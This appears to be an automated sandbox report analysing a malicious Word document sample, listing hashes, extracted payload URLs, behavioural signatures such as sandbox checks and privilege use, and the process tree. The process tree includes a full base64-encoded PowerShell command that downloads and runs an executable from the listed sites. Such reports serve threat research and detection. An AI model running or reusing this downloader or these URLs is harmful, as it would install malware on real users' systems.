Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
20/05/2024, 12:37
Behavioral task
behavioral1
Sample
5f1bbe19a2333cb402ac624a46014f28_JaffaCakes118.doc
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
5f1bbe19a2333cb402ac624a46014f28_JaffaCakes118.doc
Resource
win10v2004-20240508-en
General
-
Target
5f1bbe19a2333cb402ac624a46014f28_JaffaCakes118.doc
-
Size
154KB
-
MD5
5f1bbe19a2333cb402ac624a46014f28
-
SHA1
6bcd62ad194559166fbd621ff40d5069cc5b2d38
-
SHA256
e203577dadb325bd364b0a6609b5aa2b4df457ba261810b3e5416950dff54c8f
-
SHA512
089efbe2850665db146361b3cf64f9701e93d01dd270f500e0a0206fbdffcd5b8a86cda85a3a08c9af70c66fad01245026237bcf7105f4ba9cbcca8356e7f64c
-
SSDEEP
1536:cQYIQYjrdi1Ir77zOH98Wj2gpngB+a94+dRXalfAW66uud+BbN+rEw1:vrfrzOH98ipgXRE66uuoBsEw1
Malware Config
Extracted
http://givingthanksdaily.com/web/VK/
http://tskgear.com/wp-content/uploads/2017/Fo/
http://duolife-partner.com/wp-content/pE/
http://ponturibaschetcristianionut.com/wp-admin/G/
https://mrveggy.com/erros/tS1/
http://ifarmer.com.br/__MACOSX/2w4/
http://uniteddatabase.net/wp-admin/tf/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2384 4560 powershell.exe 84 -
Blocklisted process makes network request 7 IoCs
flow pid Process 25 2384 powershell.exe 32 2384 powershell.exe 34 2384 powershell.exe 44 2384 powershell.exe 45 2384 powershell.exe 51 2384 powershell.exe 55 2384 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 1692 WINWORD.EXE 1692 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2384 powershell.exe 2384 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2384 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 1692 WINWORD.EXE 1692 WINWORD.EXE 1692 WINWORD.EXE 1692 WINWORD.EXE 1692 WINWORD.EXE 1692 WINWORD.EXE 1692 WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5f1bbe19a2333cb402ac624a46014f28_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1692
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e JABZADEAdQA5AGsAZABtAD0AKAAnAFkAaAAnACsAKAAnAGUAMAAnACsAJwBxAG8AdwAnACkAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAGUAbgBWADoAVQBTAGUAUgBQAFIAbwBGAGkAbABlAFwAbQA0AE8AYgB5AHgAYgBcAE8AMgBlAGUAMABRAGsAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABpAFIAZQBjAFQAbwByAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBgAGMAVQByAGAASQBgAFQAeQBgAHAAUgBvAFQATwBjAG8AbAAiACAAPQAgACgAKAAnAHQAJwArACcAbABzACcAKQArACgAJwAxADIALAAnACsAJwAgACcAKwAnAHQAbABzADEAJwApACsAKAAnADEALAAnACsAJwAgACcAKQArACgAJwB0AGwAJwArACcAcwAnACkAKQA7ACQASgBvAGMAXwByAHYAZwAgAD0AIAAoACcAVwAnACsAKAAnAF8AYwAnACsAJwAxACcAKQArACgAJwB5AHkAJwArACcAegAnACkAKQA7ACQAVAB5ADAAbABxAGQAMwA9ACgAJwBDACcAKwAnAGQAJwArACgAJwBjACcAKwAnADMAYgBpADcAJwApACkAOwAkAEMANAAzAHMAYwB1AGgAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAewAwAH0ATQA0AG8AYgAnACsAJwB5ACcAKwAnAHgAYgB7ADAAJwArACcAfQBPADIAZQBlADAAJwArACcAcQBrAHsAMAB9ACcAKQAgAC0ARgBbAEMAaABhAHIAXQA5ADIAKQArACQASgBvAGMAXwByAHYAZwArACgAKAAnAC4AJwArACcAZQB4ACcAKQArACcAZQAnACkAOwAkAEwAbABkAHEAdABjAHkAPQAoACcARAA2ACcAKwAoACcAagBfACcAKwAnAG4AdQAnACkAKwAnAGwAJwApADsAJABBAHcAYwB4ADIAYwB3AD0AJgAoACcAbgAnACsAJwBlAHcALQBvAGIAagBlACcAKwAnAGMAJwArACcAdAAnACkAIABuAEUAVAAuAHcAZQBCAGMATABpAEUATgBUADsAJABSAGYAOQBzAG4AcwBvAD0AKAAnAGgAdAAnACsAKAAnAHQAJwArACcAcAA6AC8ALwAnACkAKwAnAGcAJwArACcAaQAnACsAKAAnAHYAJwArACcAaQBuACcAKQArACcAZwB0ACcAKwAnAGgAJwArACcAYQAnACsAKAAnAG4AawBzAGQAJwArACcAYQAnACkAKwAnAGkAbAAnACsAJwB5ACcAKwAnAC4AJwArACcAYwAnACsAKAAnAG8AJwArACcAbQAvAHcAZQAnACsAJwBiAC8AJwApACsAKAAnAFYAJwArACcASwAvACcAKQArACgAJwAqACcAKwAnAGgAdAB0AHAAJwApACsAJwA6AC8AJwArACcALwAnACsAKAAnAHQAJwArACcAcwBrAGcAZQAnACkAKwAoACcAYQAnACsAJwByAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwBwAC0AYwAnACsAJwBvAG4AJwArACcAdAAnACkAKwAoACcAZQBuAHQAJwArACcALwB1AHAAbAAnACsAJwBvAGEAZABzAC8AMgAwADEANwAnACkAKwAoACcALwAnACsAJwBGAG8ALwAqACcAKwAnAGgAJwApACsAKAAnAHQAdAAnACsAJwBwADoALwAnACkAKwAnAC8AJwArACgAJwBkACcAKwAnAHUAbwBsACcAKQArACgAJwBpAGYAJwArACcAZQAtAHAAJwApACsAKAAnAGEAJwArACcAcgB0AG4AZQAnACkAKwAoACcAcgAnACsAJwAuAGMAJwApACsAKAAnAG8AJwArACcAbQAvAHcAcAAtAGMAJwApACsAJwBvAG4AJwArACgAJwB0ACcAKwAnAGUAbgB0AC8AJwApACsAJwBwACcAKwAoACcARQAnACsAJwAvACoAJwApACsAKAAnAGgAdAB0ACcAKwAnAHAAOgAnACkAKwAoACcALwAvAHAAJwArACcAbwBuACcAKwAnAHQAdQAnACkAKwAoACcAcgBpACcAKwAnAGIAYQBzAGMAJwArACcAaABlACcAKQArACgAJwB0ACcAKwAnAGMAcgAnACkAKwAnAGkAJwArACgAJwBzAHQAaQAnACsAJwBhACcAKQArACcAbgAnACsAKAAnAGkAbwBuACcAKwAnAHUAdAAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvAHcAcAAnACkAKwAoACcALQAnACsAJwBhAGQAJwApACsAKAAnAG0AaQAnACsAJwBuAC8ARwAvACcAKQArACcAKgBoACcAKwAoACcAdAB0AHAAJwArACcAcwA6ACcAKQArACgAJwAvACcAKwAnAC8AbQByAHYAZQBnACcAKwAnAGcAeQAuACcAKQArACcAYwAnACsAKAAnAG8AbQAvAGUAJwArACcAcgByAG8AcwAvACcAKwAnAHQAJwApACsAJwBTADEAJwArACgAJwAvACoAJwArACcAaAB0AHQAcAA6ACcAKwAnAC8AJwApACsAKAAnAC8AaQBmACcAKwAnAGEAcgBtAGUAcgAuACcAKwAnAGMAbwBtAC4AYgByAC8AXwAnACsAJwBfACcAKwAnAE0AQQBDAE8AJwApACsAJwBTACcAKwAnAFgAJwArACcALwAnACsAKAAnADIAdwA0ACcAKwAnAC8AKgBoACcAKwAnAHQAdAAnACkAKwAoACcAcAA6AC8AJwArACcALwAnACkAKwAoACcAdQBuAGkAJwArACcAdAAnACkAKwAnAGUAZAAnACsAKAAnAGQAJwArACcAYQB0AGEAYgBhACcAKQArACgAJwBzACcAKwAnAGUALgBuACcAKwAnAGUAdAAvAHcAJwArACcAcAAtAGEAZABtACcAKQArACcAaQAnACsAJwBuAC8AJwArACgAJwB0ACcAKwAnAGYALwAnACkAKQAuACIAUwBwAEwAYABpAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABCAGMAZwB4AGYAYQB4AD0AKAAoACcATABnADYAJwArACcAbgAnACkAKwAnAG0AJwArACcANgBpACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAFYAYQBmAHUAdABjAHoAIABpAG4AIAAkAFIAZgA5AHMAbgBzAG8AKQB7AHQAcgB5AHsAJABBAHcAYwB4ADIAYwB3AC4AIgBEAE8AdwBgAE4AbABgAE8AQQBgAEQARgBJAEwAZQAiACgAJABWAGEAZgB1AHQAYwB6ACwAIAAkAEMANAAzAHMAYwB1AGgAKQA7ACQAQwAxAGoAbgB2AGkAOQA9ACgAJwBaADQAJwArACgAJwBoAHYAJwArACcANQAnACkAKwAnADMAdQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJAHQAZQAnACsAJwBtACcAKQAgACQAQwA0ADMAcwBjAHUAaAApAC4AIgBMAGAAZQBgAE4AZwB0AEgAIgAgAC0AZwBlACAAMwAwADgAMgAyACkAIAB7ACYAKAAnAEkAbgB2AG8AJwArACcAawAnACsAJwBlAC0ASQB0AGUAJwArACcAbQAnACkAKAAkAEMANAAzAHMAYwB1AGgAKQA7ACQAVQAxADAAYwBpAGgAcQA9ACgAKAAnAEcAJwArACcAYQBtAGgAJwApACsAKAAnAGsAJwArACcANQBrACcAKQApADsAYgByAGUAYQBrADsAJABRADcAeQBsADkAegA1AD0AKAAoACcATQB4ACcAKwAnAG4ANQBjACcAKQArACcAYQB5ACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASQB2AHQAZQBrAHUANwA9ACgAKAAnAFYAJwArACcAMQBsAGgAJwApACsAJwB3ACcAKwAnAHIAegAnACkA1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2384
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851227[[fn=sist02]].xsl
Filesize245KB
MD5f883b260a8d67082ea895c14bf56dd56
SHA17954565c1f243d46ad3b1e2f1baf3281451fc14b
SHA256ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353
SHA512d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e
-
Filesize
60KB
MD56b8469cda5a5dd989f9b1b5d0748e0cb
SHA15d0e53f5ba85ef5288a1883e75528e3df3a3da60
SHA256b3e2d2bb65ee223bda473aab760bafaacf3e6fab52f0c290690e5ff5632fd1d2
SHA512bba57cc6d1ecb240404f75f97549de22aac482894f3d1ca203aaf2236d05af01f8c51c7d11a86d8f8b5251ce8a28c9d7ba47912c91e4f6b0d14b1644c836634a